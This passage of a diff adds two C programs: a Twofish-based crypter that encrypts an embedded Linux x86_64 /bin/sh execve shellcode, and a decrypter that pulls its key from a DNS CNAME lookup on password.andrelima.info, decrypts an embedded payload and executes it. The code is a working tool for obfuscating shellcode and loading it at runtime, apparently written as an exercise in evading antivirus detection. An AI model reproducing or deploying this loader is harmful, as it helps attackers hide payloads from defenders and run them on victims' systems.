+void keySched(BYTE M[], int N, u32 **S, u32 K[40], int *k)
+{
+    u32 Mo[4], Me[4];
+    int i, j;
+    BYTE vector[8];
+    u32 A, B;
+
+    *k = (N + 63) / 64;
+    *S = (u32*)malloc(sizeof(u32) * (*k));
+
+    for (i = 0; i < *k; i++)
+    {
+	Me[i] = BSWAP(((u32*)M)[2*i]);
+	Mo[i] = BSWAP(((u32*)M)[2*i+1]);
+    }
+
+    for (i = 0; i < *k; i++)
+    {
+	for (j = 0; j < 4; j++) vector[j] = _b(Me[i], j);
+	for (j = 0; j < 4; j++) vector[j+4] = _b(Mo[i], j);
+	(*S)[(*k)-i-1] = RSMatrixMultiply(vector);
+    }
+    for (i = 0; i < 20; i++)
+    {
+	A = h(2*i*RHO, Me, *k);
+	B = ROL(h(2*i*RHO + RHO, Mo, *k), 8);
+	K[2*i] = A+B;
+	K[2*i+1] = ROL(A + 2*B, 9);
+    }
+}	
+
+void printHex(BYTE b[], int lim)
+{
+    int i;
+    for (i=0; i<lim;i++) 
+	printf("\\x%02X", (u32)b[i]);
+}
+
+char* gen_rdm_bytestream (size_t num_bytes) {
+    char *stream = malloc (num_bytes);
+    for (size_t i = 0; i < num_bytes; i++)
+        stream[i] = rand();
+    return stream;
+}
+
+int main(int argc, char **argv)
+{
+    u32 *S;
+    u32 K[40];
+    int k;
+    u32 QF[4][256];
+    BYTE plaintext[16]; // single 128bit block
+    BYTE key[32];
+    int sh_bytes_left;
+    int key_len = strlen(argv[1]);
+    BYTE shellcode[] = \
+        "\x6a\x3b\x58\x99\x52\x48\xbb\x2f\x2f\x62\x69\x6e\x2f\x73\x68\x53\x54\x5f\x52\x54\x5a\x57\x54\x5e\x0f\x05";
+    int shellcode_len = strlen((char*)shellcode);
+    
+    memset(key, 0, 32);
+    memcpy(key, argv[1], key_len);
+    keySched(key, 128, &S, K, &k);
+    fullKey(S, k, QF);
+    free(S);
+    int i=0;
+    int j=16;
+    srand(time(NULL));
+    printf("\nTwofish encrypted shellcode:\n");
+    while (i < shellcode_len) {
+        memcpy(plaintext, gen_rdm_bytestream(16), 16); // this will make it so the padding bytes are random, and hence more secure.
+        if (j <= shellcode_len) {
+            memcpy(plaintext, &shellcode[i], 16);
+            i=j; j+= 16;
+        }else {
+            sh_bytes_left = shellcode_len%16;
+            memcpy(plaintext, &shellcode[i],sh_bytes_left);
+            i=j;
+        }
+        //printf("before-->"); printHex(plaintext, 16); printf("\n");
+        encrypt(K, QF, plaintext);
+        //printf("after--->"); printHex(plaintext, 16); printf("\n");
+        printHex(plaintext, 16);
+    }
+    printf("\n\n");
+    return 0;
+}
+/*----- Crypter.c ----- */
+
+/*----- Decrypter.c ----- */
+/* 
+   Optimized Twofish C implementation by Drew Csillag: https://www.schneier.com/code/twofish-cpy.zip
+   Partially re-written by Andre Lima (https://andrelima.info) to encrypt/decrypt variable length Linux x86_64 shellcode.
+   
+   compiler is gcc(egcs-2.91.66)
+   flags are -O3 -fomit-frame-pointer -Wall 
+   Processor is 233Mhz Pentium II (Deschutes)
+   OS is Linux 2.2.16
+*/
+
+#include <stdio.h>
+#include <stdlib.h>
+#include <string.h>
+#include "tables.h"
+#include <sys/socket.h>  //you know what this is for
+#include <arpa/inet.h>   //inet_addr , inet_ntoa , ntohs etc
+#include <netinet/in.h>
+#include <unistd.h>      //getpid
+#define u32 unsigned int
+#define BYTE unsigned char
+#define RS_MOD 0x14D
+#define RHO 0x01010101L
+
+#define ROL(x,n) (((x) << ((n) & 0x1F)) | ((x) >> (32-((n) & 0x1F))))
+#define ROR(x,n) (((x) >> ((n) & 0x1F)) | ((x) << (32-((n) & 0x1F))))
+
+#if BIG_ENDIAN == 1
+#define BSWAP(x) (((ROR(x,8) & 0xFF00FF00) | (ROL(x,8) & 0x00FF00FF)))
+#else
+#define BSWAP(x) (x)
+#endif
+
+#define _b(x, N) (((x) >> (N*8)) & 0xFF)
+
+/* just casting to byte (instead of masking with 0xFF saves *tons* of clocks 
+   (around 50) */
+#define b0(x) ((BYTE)(x))
+/* this saved 10 clocks */
+#define b1(x) ((BYTE)((x) >> 8))
+/* use byte cast here saves around 10 clocks */
+#define b2(x) (BYTE)((x) >> 16)
+/* don't need to mask since all bits are in lower 8 - byte cast here saves
+   nothing, but hey, what the hell, it doesn't hurt any */
+#define b3(x) (BYTE)((x) >> 24)  
+
+#define BYTEARRAY_TO_U32(r) ((r[0] << 24) ^ (r[1] << 16) ^ (r[2] << 8) ^ r[3])
+#define BYTES_TO_U32(r0, r1, r2, r3) ((r0 << 24) ^ (r1 << 16) ^ (r2 << 8) ^ r3)
+
+void printSubkeys(u32 K[40])
+{
+    int i;
+    printf("round subkeys\n");
+    for (i=0;i<40;i+=2)
+	printf("%08X %08X\n", K[i], K[i+1]);
+}
+
+/* 
+   multiply two polynomials represented as u32's, actually called with BYTES,
+   but since I'm not really going to too much work to optimize key setup (since
+   raw encryption speed is what I'm after), big deal.
+*/
+u32 polyMult(u32 a, u32 b)
+{
+    u32 t=0;
+    while (a)
+    {
+	/*printf("A=%X  B=%X  T=%X\n", a, b, t);*/
+	if (a&1) t^=b;
+	b <<= 1;
+	a >>= 1;
+    }
+    return t;
+}
+	    
+/* take the polynomial t and return the t % modulus in GF(256) */
+u32 gfMod(u32 t, u32 modulus)
+{
+    int i;
+    u32 tt;
+
+    modulus <<= 7;
+    for (i = 0; i < 8; i++)
+    {
+	tt = t ^ modulus;
+	if (tt < t) t = tt;
+	modulus >>= 1;
+    }
+    return t;
+}
+
+/*multiply a and b and return the modulus */
+#define gfMult(a, b, modulus) gfMod(polyMult(a, b), modulus)
+
+/* return a u32 containing the result of multiplying the RS Code matrix
+   by the sd matrix
+*/
+u32 RSMatrixMultiply(BYTE sd[8])
+{
+    int j, k;
+    BYTE t;
+    BYTE result[4];
+
+    for (j = 0; j < 4; j++)
+    {
+	t = 0;
+	for (k = 0; k < 8; k++)
+	{
+	    /*printf("t=%X  %X\n", t, gfMult(RS[j][k], sd[k], RS_MOD));*/
+	    t ^= gfMult(RS[j][k], sd[k], RS_MOD);
+	}
+	result[3-j] = t;
+    }
+    return BYTEARRAY_TO_U32(result);
+}
+
+/* the Zero-keyed h function (used by the key setup routine) */
+u32 h(u32 X, u32 L[4], int k)
+{
+    BYTE y0, y1, y2, y3;
+    BYTE z0, z1, z2, z3;
+    y0 = b0(X);
+    y1 = b1(X);
+    y2 = b2(X);
+    y3 = b3(X);
+
+    switch(k)
+    {
+	case 4:
+	    y0 = Q1[y0] ^ b0(L[3]);
+	    y1 = Q0[y1] ^ b1(L[3]);
+	    y2 = Q0[y2] ^ b2(L[3]);
+	    y3 = Q1[y3] ^ b3(L[3]);
+	case 3:
+	    y0 = Q1[y0] ^ b0(L[2]);
+	    y1 = Q1[y1] ^ b1(L[2]);
+	    y2 = Q0[y2] ^ b2(L[2]);
+	    y3 = Q0[y3] ^ b3(L[2]);
+	case 2:
+	    y0 = Q1[  Q0 [ Q0[y0] ^ b0(L[1]) ] ^ b0(L[0]) ];
+	    y1 = Q0[  Q0 [ Q1[y1] ^ b1(L[1]) ] ^ b1(L[0]) ];
+	    y2 = Q1[  Q1 [ Q0[y2] ^ b2(L[1]) ] ^ b2(L[0]) ];
+	    y3 = Q0[  Q1 [ Q1[y3] ^ b3(L[1]) ] ^ b3(L[0]) ];
+    }
+
+    /* inline the MDS matrix multiply */
+    z0 = multEF[y0] ^ y1 ^         multEF[y2] ^ mult5B[y3]; 
+    z1 = multEF[y0] ^ mult5B[y1] ^ y2 ^         multEF[y3]; 
+    z2 = mult5B[y0] ^ multEF[y1] ^ multEF[y2] ^ y3; 
+    z3 = y0 ^         multEF[y1] ^ mult5B[y2] ^ mult5B[y3]; 
+
+    return BYTES_TO_U32(z0, z1, z2, z3);
+}
+
+/* given the Sbox keys, create the fully keyed QF */
+void fullKey(u32 L[4], int k, u32 QF[4][256])
+{
+    BYTE y0, y1, y2, y3;
+
+    int i;
+    
+    /* for all input values to the Q permutations */
+    for (i=0; i<256; i++)
+    {
+	/* run the Q permutations */
+	y0 = i; y1=i; y2=i; y3=i;
+	switch(k)
+    	{
+    	    case 4:
+    		y0 = Q1[y0] ^ b0(L[3]);
+    		y1 = Q0[y1] ^ b1(L[3]);
+    		y2 = Q0[y2] ^ b2(L[3]);
+    		y3 = Q1[y3] ^ b3(L[3]);
+    	    case 3:
+    		y0 = Q1[y0] ^ b0(L[2]);
+    		y1 = Q1[y1] ^ b1(L[2]);
+    		y2 = Q0[y2] ^ b2(L[2]);
+    		y3 = Q0[y3] ^ b3(L[2]);
+    	    case 2:
+    		y0 = Q1[  Q0 [ Q0[y0] ^ b0(L[1]) ] ^ b0(L[0]) ];
+    		y1 = Q0[  Q0 [ Q1[y1] ^ b1(L[1]) ] ^ b1(L[0]) ];
+    		y2 = Q1[  Q1 [ Q0[y2] ^ b2(L[1]) ] ^ b2(L[0]) ];
+    		y3 = Q0[  Q1 [ Q1[y3] ^ b3(L[1]) ] ^ b3(L[0]) ];
+    	}
+	
+	/* now do the partial MDS matrix multiplies */
+	QF[0][i] = ((multEF[y0] << 24) 
+		    | (multEF[y0] << 16) 
+		    | (mult5B[y0] << 8)
+		    | y0);
+	QF[1][i] = ((y1 << 24) 
+		    | (mult5B[y1] << 16) 
+		    | (multEF[y1] << 8)
+		    | multEF[y1]);
+	QF[2][i] = ((multEF[y2] << 24) 
+		    | (y2 << 16) 
+		    | (multEF[y2] << 8)
+		    | mult5B[y2]);
+	QF[3][i] = ((mult5B[y3] << 24) 
+		    | (multEF[y3] << 16)
+		    | (y3 << 8) 
+		    | mult5B[y3]);
+    }
+}
+
+/* fully keyed h (aka g) function */
+#define fkh(X) (S[0][b0(X)]^S[1][b1(X)]^S[2][b2(X)]^S[3][b3(X)])
+
+/* one decryption round */
+#define DEC_ROUND(R0, R1, R2, R3, round) \
+    T0 = fkh(R0); \
+    T1 = fkh(ROL(R1, 8)); \
+    R2 = ROL(R2, 1) ^ (T0 + T1 + K[2*round+8]); \
+    R3 = ROR(R3 ^ (T0 + 2*T1 + K[2*round+9]), 1); 
+
+inline void decrypt(u32 K[40], u32 S[4][256], BYTE PT[16])
+{
+    u32 T0, T1;
+    u32 R0, R1, R2, R3;
+
+    /* load/byteswap/whiten input */
+    R3 = K[7] ^ BSWAP(((u32*)PT)[3]);
+    R2 = K[6] ^ BSWAP(((u32*)PT)[2]);
+    R1 = K[5] ^ BSWAP(((u32*)PT)[1]);
+    R0 = K[4] ^ BSWAP(((u32*)PT)[0]);
+
+    DEC_ROUND(R0, R1, R2, R3, 15);
+    DEC_ROUND(R2, R3, R0, R1, 14);
+    DEC_ROUND(R0, R1, R2, R3, 13);
+    DEC_ROUND(R2, R3, R0, R1, 12);
+    DEC_ROUND(R0, R1, R2, R3, 11);
+    DEC_ROUND(R2, R3, R0, R1, 10);
+    DEC_ROUND(R0, R1, R2, R3, 9);
+    DEC_ROUND(R2, R3, R0, R1, 8);
+    DEC_ROUND(R0, R1, R2, R3, 7);
+    DEC_ROUND(R2, R3, R0, R1, 6);
+    DEC_ROUND(R0, R1, R2, R3, 5);
+    DEC_ROUND(R2, R3, R0, R1, 4);
+    DEC_ROUND(R0, R1, R2, R3, 3);
+    DEC_ROUND(R2, R3, R0, R1, 2);
+    DEC_ROUND(R0, R1, R2, R3, 1);
+    DEC_ROUND(R2, R3, R0, R1, 0);
+
+    /* load/byteswap/whiten output */
+    ((u32*)PT)[3] = BSWAP(R1 ^ K[3]);
+    ((u32*)PT)[2] = BSWAP(R0 ^ K[2]);
+    ((u32*)PT)[1] = BSWAP(R3 ^ K[1]);
+    ((u32*)PT)[0] = BSWAP(R2 ^ K[0]);
+
+}
+
+/* the key schedule routine */
+void keySched(BYTE M[], int N, u32 **S, u32 K[40], int *k)
+{
+    u32 Mo[4], Me[4];
+    int i, j;
+    BYTE vector[8];
+    u32 A, B;
+
+    *k = (N + 63) / 64;
+    *S = (u32*)malloc(sizeof(u32) * (*k));
+
+    for (i = 0; i < *k; i++)
+    {
+	Me[i] = BSWAP(((u32*)M)[2*i]);
+	Mo[i] = BSWAP(((u32*)M)[2*i+1]);
+    }
+
+    for (i = 0; i < *k; i++)
+    {
+	for (j = 0; j < 4; j++) vector[j] = _b(Me[i], j);
+	for (j = 0; j < 4; j++) vector[j+4] = _b(Mo[i], j);
+	(*S)[(*k)-i-1] = RSMatrixMultiply(vector);
+    }
+    for (i = 0; i < 20; i++)
+    {
+	A = h(2*i*RHO, Me, *k);
+	B = ROL(h(2*i*RHO + RHO, Mo, *k), 8);
+	K[2*i] = A+B;
+	K[2*i+1] = ROL(A + 2*B, 9);
+    }
+}	
+
+void printHex(BYTE b[], int lim)
+{
+    int i;
+    for (i=0; i<lim;i++) 
+	printf("%02X", (u32)b[i]);
+}
+
+
+/*
+
+Code altered from Silver Moon (m00n.silv3r@gmail.com)
+- http://www.binarytides.com/dns-query-code-in-c-with-linux-sockets/
+
+*/
+
+//DNS server
+char* dns_server = "8.8.8.8";
+
+//hostname which CNAME register will return the password for the decrypter
+char hostname[100];
+
+//Types of DNS resource records:
+ 
+#define T_A 1 //Ipv4 address
+#define T_NS 2 //Nameserver
+#define T_CNAME 5 // canonical name
+#define T_SOA 6 /* start of authority zone */
+#define T_PTR 12 /* domain name pointer */
+#define T_MX 15 //Mail server
+ 
+//Function Prototypes
+char* ngethostbyname (unsigned char* , int);
+void ChangetoDnsNameFormat (unsigned char*,unsigned char*);
+unsigned char* ReadName (unsigned char*,unsigned char*,int*);
+ 
+//DNS header structure
+struct DNS_HEADER
+{
+    unsigned short id; // identification number
+ 
+    unsigned char rd :1; // recursion desired
+    unsigned char tc :1; // truncated message
+    unsigned char aa :1; // authoritive answer
+    unsigned char opcode :4; // purpose of message
+    unsigned char qr :1; // query/response flag
+ 
+    unsigned char rcode :4; // response code
+    unsigned char cd :1; // checking disabled
+    unsigned char ad :1; // authenticated data
+    unsigned char z :1; // its z! reserved
+    unsigned char ra :1; // recursion available
+ 
+    unsigned short q_count; // number of question entries
+    unsigned short ans_count; // number of answer entries
+    unsigned short auth_count; // number of authority entries
+    unsigned short add_count; // number of resource entries
+};
+ 
+//Constant sized fields of query structure
+struct QUESTION
+{
+    unsigned short qtype;
+    unsigned short qclass;
+};
+ 
+//Constant sized fields of the resource record structure
+#pragma pack(push, 1)
+struct R_DATA
+{
+    unsigned short type;
+    unsigned short _class;
+    unsigned int ttl;
+    unsigned short data_len;
+};
+#pragma pack(pop)
+ 
+//Pointers to resource record contents
+struct RES_RECORD
+{
+    unsigned char *name;
+    struct R_DATA *resource;
+    unsigned char *rdata;
+};
+ 
+//Structure of a Query
+typedef struct
+{
+    unsigned char *name;
+    struct QUESTION *ques;
+} QUERY;
+
+int main(int argc, char **argv)
+{
+    char* password; 
+    strcpy(hostname , "password.andrelima.info");
+    password = ngethostbyname((unsigned char*)hostname , T_CNAME);
+    char* firstDot = strchr(password,'.');
+    *firstDot = (char)0;
+    printf("\nRetrieved password is: %s\n\n",password);
+
+    u32 *S;
+    u32 K[40];
+    int k;
+    u32 QF[4][256];
+    BYTE plaintext[16]; // single 128bit block
+    BYTE key[32];
+    // int key_len = strlen(argv[1]);
+    int key_len = strlen(password);
+    BYTE shellcode[] = \
+        "\x55\x9B\x2B\x3A\x9E\x73\x23\xCE\xC5\x7B\x61\xDC\x97\x40\x29\xC9\x83\x49\x59\x5E\xE7\x28\x9B\x46\x79\xB2\x8E\x73\x04\x64\x11\x54";
+    int shellcode_len = strlen((char*)shellcode);
+    int (*ret)() = (int(*)())shellcode;
+
+    memset(key, 0, 32);
+    //memcpy(key, argv[1], key_len);
+    memcpy(key, password, key_len);
+    keySched(key, 128, &S, K, &k);
+    fullKey(S, k, QF);
+    free(S);
+    int i=0;
+    while (i < shellcode_len) {
+        memcpy(plaintext, &shellcode[i], 16);
+        //printf("before-->"); printHex(plaintext, 16); printf("\n");
+        decrypt(K, QF, plaintext);
+        //printf("after--->"); printHex(plaintext, 16); printf("\n");
+	    printHex(plaintext, 16);
+        memcpy(&shellcode[i], plaintext, 16);
+        i += 16;
+    }
+    printf("\n");
+    ret();
+    return 0;
+}
+
+/*
+ * Perform a DNS query by sending a packet
+ * */
+char* ngethostbyname(unsigned char *host , int query_type)
+{
+    unsigned char buf[65536],*qname,*reader;
+    int i , j , stop , s;
+    char* password; password = NULL;
+ 
+    struct sockaddr_in a;
+ 
+    struct RES_RECORD answers[20],auth[20],addit[20]; //the replies from the DNS server
+    struct sockaddr_in dest;
+ 
+    struct DNS_HEADER *dns = NULL;
+    struct QUESTION *qinfo = NULL;
+ 
+    printf("\nResolving %s" , host);
+ 
+    s = socket(AF_INET , SOCK_DGRAM , IPPROTO_UDP); //UDP packet for DNS queries
+ 
+    dest.sin_family = AF_INET;
+    dest.sin_port = htons(53);
+    dest.sin_addr.s_addr = inet_addr(dns_server); //dns servers
+ 
+    //Set the DNS structure to standard queries
+    dns = (struct DNS_HEADER *)&buf;
+ 
+    dns->id = (unsigned short) htons(getpid());
+    dns->qr = 0; //This is a query
+    dns->opcode = 0; //This is a standard query
+    dns->aa = 0; //Not Authoritative
+    dns->tc = 0; //This message is not truncated
+    dns->rd = 1; //Recursion Desired
+    dns->ra = 0; //Recursion not available! hey we dont have it (lol)
+    dns->z = 0;
+    dns->ad = 0;
+    dns->cd = 0;
+    dns->rcode = 0;
+    dns->q_count = htons(1); //we have only 1 question
+    dns->ans_count = 0;
+    dns->auth_count = 0;
+    dns->add_count = 0;
+ 
+    //point to the query portion
+    qname =(unsigned char*)&buf[sizeof(struct DNS_HEADER)];
+ 
+    ChangetoDnsNameFormat(qname , host);
+    qinfo =(struct QUESTION*)&buf[sizeof(struct DNS_HEADER) + (strlen((const char*)qname) + 1)]; //fill it
+ 
+    qinfo->qtype = htons( query_type ); //type of the query , A , MX , CNAME , NS etc
+    qinfo->qclass = htons(1); //its internet (lol)
+ 
+    printf("\nSending Packet...");
+    if( sendto(s,(char*)buf,sizeof(struct DNS_HEADER) + (strlen((const char*)qname)+1) + sizeof(struct QUESTION),0,(struct sockaddr*)&dest,sizeof(dest)) < 0)
+    {
+        perror("sendto failed");
+    }
+    printf("Done");
+     
+    //Receive the answer
+    i = sizeof dest;
+    printf("\nReceiving answer...");
+    if(recvfrom (s,(char*)buf , 65536 , 0 , (struct sockaddr*)&dest , (socklen_t*)&i ) < 0)
+    {
+        perror("recvfrom failed");
+    }
+    printf("Done");
+ 
+    dns = (struct DNS_HEADER*) buf;
+ 
+    //move ahead of the dns header and the query field
+    reader = &buf[sizeof(struct DNS_HEADER) + (strlen((const char*)qname)+1) + sizeof(struct QUESTION)];
+ 
+    printf("\nThe response contains : ");
+    printf("\n %d Questions.",ntohs(dns->q_count));
+    printf("\n %d Answers.",ntohs(dns->ans_count));
+    printf("\n %d Authoritative Servers.",ntohs(dns->auth_count));
+    printf("\n %d Additional records.\n\n",ntohs(dns->add_count));
+ 
+    //Start reading answers
+    stop=0;
+ 
+    for(i=0;i<ntohs(dns->ans_count);i++)
+    {
+        answers[i].name=ReadName(reader,buf,&stop);
+        reader = reader + stop;
+ 
+        answers[i].resource = (struct R_DATA*)(reader);
+        reader = reader + sizeof(struct R_DATA);
+ 
+        if(ntohs(answers[i].resource->type) == 1) //if its an ipv4 address
+        {
+            answers[i].rdata = (unsigned char*)malloc(ntohs(answers[i].resource->data_len));
+ 
+            for(j=0 ; j<ntohs(answers[i].resource->data_len) ; j++)
+            {
+                answers[i].rdata[j]=reader[j];
+            }
+ 
+            answers[i].rdata[ntohs(answers[i].resource->data_len)] = '\0';
+ 
+            reader = reader + ntohs(answers[i].resource->data_len);
+        }
+        else
+        {
+            answers[i].rdata = ReadName(reader,buf,&stop);
+            reader = reader + stop;
+        }
+    }
+ 
+    //read authorities
+    for(i=0;i<ntohs(dns->auth_count);i++)
+    {
+        auth[i].name=ReadName(reader,buf,&stop);
+        reader+=stop;
+ 
+        auth[i].resource=(struct R_DATA*)(reader);
+        reader+=sizeof(struct R_DATA);
+ 
+        auth[i].rdata=ReadName(reader,buf,&stop);
+        reader+=stop;
+    }
+ 
+    //read additional
+    for(i=0;i<ntohs(dns->add_count);i++)
+    {
+        addit[i].name=ReadName(reader,buf,&stop);
+        reader+=stop;
+ 
+        addit[i].resource=(struct R_DATA*)(reader);
+        reader+=sizeof(struct R_DATA);
+ 
+        if(ntohs(addit[i].resource->type)==1)
+        {
+            addit[i].rdata = (unsigned char*)malloc(ntohs(addit[i].resource->data_len));
+            for(j=0;j<ntohs(addit[i].resource->data_len);j++)
+            addit[i].rdata[j]=reader[j];
+ 
+            addit[i].rdata[ntohs(addit[i].resource->data_len)]='\0';
+            reader+=ntohs(addit[i].resource->data_len);
+        }
+        else
+        {
+            addit[i].rdata=ReadName(reader,buf,&stop);
+            reader+=stop;
+        }
+    }
+ 
+    //print answers
+    printf("Answer Records : %d \n" , ntohs(dns->ans_count) );
+    for(i=0 ; i < ntohs(dns->ans_count) ; i++)
+    {
+        printf("Name : %s ",answers[i].name);
+ 
+        if( ntohs(answers[i].resource->type) == T_A) //IPv4 address
+        {
+            long *p;
+            p=(long*)answers[i].rdata;
+            a.sin_addr.s_addr=(*p); //working without ntohl
+            printf("has IPv4 address : %s",inet_ntoa(a.sin_addr));
+        }
+         
+        if(ntohs(answers[i].resource->type)==5) 
+        {
+            //Canonical name for an alias
+            printf("has alias name : %s",answers[i].rdata);
+            password = (char*)malloc(strlen((char*)answers[i].rdata));
+            strcpy(password,(char*)answers[i].rdata);
+        }
+ 
+        printf("\n");
+    }
+ 
+    //print authorities
+    printf("Authoritive Records : %d \n" , ntohs(dns->auth_count) );
+    for( i=0 ; i < ntohs(dns->auth_count) ; i++)
+    {
+         
+        printf("Name : %s ",auth[i].name);
+        if(ntohs(auth[i].resource->type)==2)
+        {
+            printf("has nameserver : %s",auth[i].rdata);
+        }
+        printf("\n");
+    }
+ 
+    //print additional resource records
+    printf("Additional Records : %d \n" , ntohs(dns->add_count) );
+    for(i=0; i < ntohs(dns->add_count) ; i++)
+    {
+        printf("Name : %s ",addit[i].name);
+        if(ntohs(addit[i].resource->type)==1)
+        {
+            long *p;
+            p=(long*)addit[i].rdata;
+            a.sin_addr.s_addr=(*p);
+            printf("has IPv4 address : %s",inet_ntoa(a.sin_addr));
+        }
+        printf("\n");
+    }
+    return password;
+}
+ 
+/*
+ * 
+ * */
+u_char* ReadName(unsigned char* reader,unsigned char* buffer,int* count)
+{
+    unsigned char *name;
+    unsigned int p=0,jumped=0,offset;
+    int i , j;
+ 
+    *count = 1;
+    name = (unsigned char*)malloc(256);
+ 
+    name[0]='\0';
+ 
+    //read the names in 3www6google3com format
+    while(*reader!=0)
+    {
+        if(*reader>=192)
+        {
+            offset = (*reader)*256 + *(reader+1) - 49152; //49152 = 11000000 00000000 ;)
+            reader = buffer + offset - 1;
+            jumped = 1; //we have jumped to another location so counting wont go up!
+        }
+        else
+        {
+            name[p++]=*reader;
+        }
+ 
+        reader = reader+1;
+ 
+        if(jumped==0)
+        {
+            *count = *count + 1; //if we havent jumped to another location then we can count up
+        }
+    }
+ 
+    name[p]='\0'; //string complete
+    if(jumped==1)
+    {
+        *count = *count + 1; //number of steps we actually moved forward in the packet
+    }
+ 
+    //now convert 3www6google3com0 to www.google.com
+    for(i=0;i<(int)strlen((const char*)name);i++) 
+    {
+        p=name[i];
+        for(j=0;j<(int)p;j++) 
+        {
+            name[i]=name[i+1];
+            i=i+1;
+        }
+        name[i]='.';
+    }
+    name[i-1]='\0'; //remove the last dot
+    return name;
+}
+ 
+/*
+ * This will convert www.google.com to 3www6google3com 
+ * got it :)
+ * */
+void ChangetoDnsNameFormat(unsigned char* dns,unsigned char* host) 
+{
+    int lock = 0 , i;
+    strcat((char*)host,".");
+     
+    for(i = 0 ; i < strlen((char*)host) ; i++) 
+    {
+        if(host[i]=='.') 
+        {
+            *dns++ = i-lock;
+            for(;lock<i;lock++) 
+            {
+                *dns++=host[lock];
+            }
+            lock++; //or lock=i+1;
+        }
+    }
+    *dns++='\0';
+}
+/*----- Decrypter.c ----- */
\ No newline at end of file